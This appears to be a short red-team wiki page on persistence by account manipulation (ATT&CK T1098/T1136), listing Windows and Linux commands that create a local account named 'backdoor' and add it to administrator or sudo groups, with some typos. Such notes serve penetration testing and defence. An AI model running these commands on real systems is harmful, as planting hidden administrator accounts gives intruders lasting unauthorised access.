T1098 Persistence Account Manipulation - CraigDonkin/Infrastructure GitHub Wiki

T1098: Persistence Account Manipulation/T11365: Create Account

Windows

net user /add backdoor BackD00r
net localgroup administrators backdoor /add

PS C:\WINDOWS\system32> $Password = Read-Host -AsSecureString
***
PS C:\WINDOWS\system32> New-LocalUser "foo" -Password $Password -FullName "foobar" -Description "backdoor"

Name Enabled Description
---- ------- -----------
foo  True    backdoor

PS C:\Windows\system32> Add-LocalGroupMember -Group "Administrators" -Member "foo"


Linux

adduser user
usermnod -aG sudo user

useradd user2
passwd user2

useradd -u 123 user3
useradd -G admins user3 
⚠️ **GitHub.com Fallback** ⚠️